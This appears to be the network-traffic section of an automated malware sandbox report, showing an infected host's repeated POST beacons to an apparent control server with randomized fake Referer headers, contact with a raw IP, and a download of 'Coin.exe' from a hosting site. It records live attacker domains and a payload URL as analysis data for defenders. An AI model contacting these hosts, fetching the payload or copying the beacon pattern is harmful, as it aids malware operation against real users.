              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ciagjuvshwyap.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dlseqphhdlmhj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oydqaptimmqlwlr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ubqxonkbwrw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://llwvqfhgyhhpg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yinxmrewdxvvup.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iyfnrlbdswaun.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://glhjgpfospwhdw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gcybmsqpemm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ltleqvppjdrlod.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://atmipbdihgavjw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lefbfksalyjs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wiitjtnnnvend.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rkfklwpuiufh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xqysrgfmfacgd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjsidbjqhyjuh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjsidbjqhyjuh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: epohe.ruData Raw: 3b 6e 53 16 8c c3 1a 56 d8 a9 c6 0a 06 74 7e cb 0e 0b bb 90 18 71 e6 10 7d 79 7d 9c 30 c5 c2 68 9a 57 b6 29 0e 6e 2b 11 ee 9f 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 5e 42 e9 9d 68 23 9c ab e4 7d 14 85 cc db ee f5 79 6f 88 9e b7 cd b2 1a b3 e2 ea 40 d4 17 2f 35 30 11 6e 91 11 b0 4e 3b 8c 8c ec bb ea ad 5e 68 f4 b5 cb 75 c6 5b ba 16 a8 00 d3 4d 6c 47 98 31 5e dd 5b 1a 47 37 9c 53 98 f4 b3 be cb c6 9c ec b2 34 eb c5 c4 7e 51 e3 07 2e c0 b4 47 a4 5e 3d 45 f0 93 a3 af d7 ba f5 da 9b c0 13 1c e1 ae 95 36 d5 fe 9d 53 ab 03 d2 f5 e0 ba 96 c7 c6 80 42 23 91 93 e0 45 25 ce ce c6 1b 17 94 c1 05 ff 77 6b 29 a0 77 a5 d6 99 1e bb db 05 78 67 96 22 1c e6 c5 38 f2 11 0c b6 dd be 89 85 0b bc b2 b2 77 f5 2b c6 10 0d 81 e9 bf 1f d4 2a 32 d8 1d 27 13 9d 4d 73 e8 c3 a0 3f cf 52 e1 48 9b ea 7a 9e 18 2b 73 44 27 e5 ea 01 46 d5 b8 74 9a c8 75 61 2a ac d7 ad 19 36 4c 1a 4a c2 f7 cb 0b f1 bd e1 a6 ca 00 15 6f 8e 4d 93 df ce 26 eb 71 81 27 58 9b f8 Data Ascii: ;nSVt~q}y}0hW)n+?!0jHYcM@NA -[k,vu^Bh#}yo@/50nN;^hu[MlG1^[G7S4~Q.G^=E6SB#E%wk)wxg"8w+*2'Ms?RHz+sD'Ftua*6LJoM&q'X
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbkqrcgmoxbnb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ytcopihlywgad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ylpbksvjwmy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lumgcfdgtsy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nlfvvperahgbd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: epohe.ru
              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.158
              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.158
              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.158
              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.158
              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.158
              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.158
              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.158
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /Coin.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.darkviolet-alpaca-923878.hostingersite.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: epohe.ru
              Source: global trafficDNS traffic detected: DNS query: www.darkviolet-alpaca-923878.hostingersite.com
              Source: global trafficDNS traffic detected: DNS query: api.msn.com
              Source: unknownHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fwivmymbxwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: epohe.ru
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 e4 Data Ascii: r
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 06:20:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
